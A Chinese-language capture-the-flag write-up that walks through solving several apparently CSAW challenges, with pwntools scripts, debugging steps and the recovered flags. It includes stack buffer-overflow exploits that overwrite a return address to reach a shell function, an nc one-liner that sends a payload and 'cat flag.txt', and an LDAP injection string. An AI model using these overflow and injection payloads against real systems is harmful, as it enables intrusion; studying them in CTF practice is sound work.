第一次做这样的新题目 做不出几道感觉无从下手 记录一下补题情况
思路:签到
answer:flag{typ3_y3s_to_c0nt1nue}
思路:AVL树的插入 队友发现可以先去重再插入(用C++,写的多一点)
下面给了python的
调用别人写好的函数
https://github.com/pgrafov/python-avl-tree/blob/master/pyavltree.py
code:
from pwn import *
from pyavltree import AVLTree
r = remote("misc.chal.csaw.io", 9001) # 连接服务器的命令
r.recvline() #接受一行废话
numbers = [int(x) for x in r.recvline().split(",")] #将接受到的数组除去逗号后转成list
r.recvline() # 接受一行废话
tree = AVLTree(numbers) #调用函数构造树
r.sendline(",".join([str(x) for x in tree.preorder(tree.rootNode)]))
print r.recvall()
answer:flag{HOW_WAS_IT_NAVIGATING_THAT_FOREST?}
思路:加密算法: 先解密base64 再异或解密
从 single yeet yeeted with single yeet == 0 x^x=0
code:
from base64 import b64decode
ss = "s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg=="
ciphertext = b64decode(ss)
for i in range(256):
s = ""
for j in range(len(ciphertext)):
s += chr(ord(ciphertext[j])^i)
if "flag{" in s:
print i
print s
answer:flag{diffie-hellman-g0ph3rzraOY1Jal4cHaFY9SWRyAQ6aH}
思路:服务器返回一个等式 让你求出X 刚开始以为只有加减乘除 后来发现自己还是太年轻
code:
from pwn import *
from re import *
r = remote("misc.chal.csaw.io",9002)
r.recvuntil("***")
print r.recvline()
while True:
toSolve = r.recvline()
print toSolve
print r.recvuntil("What does X equal?: ")
temp = toSolve.replace("=","-(")+")"
c=eval(temp,{"X":1j})
ans = 0
if c.imag != 0:
ans = -c.real/c.imag
r.sendline(str(ans))
print r.recvline()
answer:flag{y0u_s0_60od_aT_tH3_qU1cK_M4tH5}
思路:windows 下利用findstr 命令查找文本串
先解压
cmd :
findstr "flag" disk.img
another solution
ubuntu 下
$ 7z x disk.img0.7z
$ 7z x disk.img1.7z
$ rg -a -e "flag\{"
7z 解压然后 rg~
rg下载
参考https://github.com/BurntSushi/ripgrep 超快!查找大文件
$ curl -LO https://github.com/BurntSushi/ripgrep/releases/download/0.10.0/ripgrep_0.10.0_amd64.deb
$ sudo dpkg -i ripgrep_0.10.0_amd64.deb
code:
None
answer:flag{dis_week_evry_week_dnt_be_securty_weak}
思路: 静态分析 拖到ida里看main函数
动态跟踪
gdb -q ./boi
pdisas main
b* 0x00000000004006a8
cmp xx with xx
r
x/40wx $rsp
我们发现偏移为20 所以只要把前面20字节用垃圾值填充 后面的用正确的答案填充即可
code:
from pwn import *
r = remote("pwn.chal.csaw.io","9000")
r.recvuntil("***")
print r.recvline()
r.recvline()
addr = "\xee\xba\xf3\xca"
payload = "A"*20+addr
r.sendline(payload)
print r.recvline()
r.interactive()
or 暴力填充6次
python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"'| nc pwn.chal.c saw.io 9000
answer:flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}
思路: 下载文件 阅读 搜索problem查看所有问题位置 然后
code:
None
xor dh, dh ; <- Question 1
0x00
mov dx, 0xffff ; Hexadecimal
not dx
0x0000
mov gs, dx ; to use them to help me clear <- Question 2
问题让你输出1个字节 so 0x00
mov cx, 0 ; line 107
mov sp, cx ; line 149
mov si, sp ; Source Index <- Question 3
两个字节 0x0000
mov al, 't'
mov ah, 0x0e ; <- question 4
两个字节ax:0x0e74
mov al, [si] ;
mov ah, 0x0e ; <- Question 5!
两个字节 0x0e61 将字符串第一个字节放到了低位
code:
vim 1.txt
写入
0x00
0x00
0x0000
0x0e74
0x0e61
nc rev.chal.csaw.io 9003 < 1.txt
answer:flag{rev_up_y0ur_3ng1nes_reeeeeeeeeeeeecruit5!}
思路: 下载文件 gdb调试 + IDA静态分析
推荐gdb-peda 这里不赘述
gdb
file get_it
加载文件
info functions
显示所有函数
发现有个函数名字为give_shell
disassem give_shell
看一下函数 显然我们通过这个可以拿到shell
因此只要利用格式化字符串漏洞将栈的返回地址覆盖为give_shell的地址 那么我们的任务就完成了
接下来需要判断栈的返回地址在哪
在main的汇编代码中
0x00000000004005e0 <+25>: lea rax,[rbp-0x20]
0x00000000004005e4 <+29>: mov rdi,rax
0x00000000004005e7 <+32>: mov eax,0x0
0x00000000004005ec <+37>: call 0x4004a0 gets@plt
我们发现gets接受了字符串之后写入到rbp-0x20开始的地址中
rbp就是栈的base point(基地址)啦
栈的布局
00000000: 0x4141414141414141 AAAAAAAA // 0 需要8
00000008: 0x4141414141414141 AAAAAAAA // 8 需要8
00000010: 0x4141414141414141 AAAAAAAA // 16 需要8
00000018: 0x4141414141414141 AAAAAAAA // 24 需要8
00000020: 0x4f4c4453544b4652 OLDSTKFR // 32 <- RBP 这里也要填满 需要8
00000028: 0x52455455524e4144 RETURNAD // 40 填成give_shell的地址
因此前面40个垃圾值填充 后面的填成give_shell的地址就好啦
code:
from pwn import *
r = remote("pwn.chal.csaw.io",9001)
print r.recvline()
shell_addr = 0x00000000004005B6
r.sendline('A'*40+p64(shell_addr))
print r.recvline()
r.interactive()
answer:flag{y0u_deF_get_itls}
思路: google + github
网站点进去发现就是一堆列表 搜索题目名字 发现有idab injection 直接搜
相关的payload 一个个尝试
code:
None
*)(uid=*))(|(uid=*
answer:flag{ld4p_inj3ction_i5_a_th1ng}
思路: 普通电学
比赛的时候没做出来 其实很简单的哇 不要一股脑写01再解密 边解密边写!
电线连到主干上的状态写一下即可
code:
None
answer:flag{owmyhand}